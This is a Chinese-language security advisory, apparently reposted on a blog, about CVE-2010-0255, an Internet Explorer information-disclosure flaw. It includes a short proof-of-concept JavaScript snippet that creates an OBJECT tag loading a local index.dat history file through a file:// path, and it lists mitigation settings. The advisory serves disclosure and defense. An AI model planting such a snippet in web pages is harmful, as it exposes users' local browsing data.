细水 2010.02.05

漏洞播报

Microsoft IE动态OBJECT标签信息泄露漏洞

发布日期:2010-02-03
更新日期:2010-02-05
受影响系统:

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4

081212_explorer

 

描述:


BUGTRAQ  ID: 38055
CVE ID: CVE-2010-0255
Internet Explorer是Windows操作系统中默认捆绑的web浏览器。
Internet Explorer在加载OBJECT标签中所指定内容时如果index.dat文件直接从类似于以下的网页引用的话,则不会渲染和显示该文件的内容:
/—–
        <object data="file://127.0.0.1/C$/…/index.dat"
                type="text/html"
                width="100%" height="50"
         </object>
– —–/
但如果使用类似于以下的HTML代码就会加载并渲染该文件:
/—–
        <script language="Javascript">
                var obj = document.createElement("object");
                obj.data = "file://127.0.0.1/C$/…/index.dat";
                obj.type = "text/html";
                obj.id = "obj_results";
                obj.width = "500px";
                obj.height = "300px";
                document.body.appendChild(obj);
         </script>
– —–/
<*来源:Federico Muttis
        Jorge Luis Alvarez Medina
  链接:http://marc.info/?l=bugtraq&m=126523704719372&w=2
http://www.microsoft.com/technet/security/advisory/980088.mspx?pf=true
*>
测试方法:


警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
* 对Windows XP启用Internet Explorer网络协议锁定。
建议:


厂商补丁:
Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp


您可以随意转载,但必须在显著位置标明 原创链接 和本 版权声明

本文链接: http://www.mcafeefans.com/?p=3007

1 评论

Pingback / TrackBack

发表评论

电子邮件地址不会被公开。

:wink: :twisted: :roll: :mrgreen: 8) :-D :arrow: :-o more »

返回页首返回页尾